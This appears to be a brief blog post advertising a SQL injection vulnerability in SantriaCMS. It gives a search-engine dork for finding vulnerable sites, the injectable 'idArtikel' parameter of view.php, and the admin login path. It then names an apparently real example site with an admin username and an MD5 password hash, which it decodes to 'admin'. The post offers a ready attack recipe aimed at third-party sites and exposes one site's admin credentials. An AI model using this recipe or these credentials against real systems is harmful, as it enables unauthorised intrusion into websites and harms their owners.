SantriaCMS SQL Injection Vulnerability
Dork : "view.php?idArtikel="Exploit :http://target.com/cms/view.php?idArtikel=[SQLi] adminpage = /login.php example site :http://joksus.comusername : adminpassword : 21232f297a57a5a743894a0e4a801fc3 => [admin] 






0 Coment:
Posting Komentar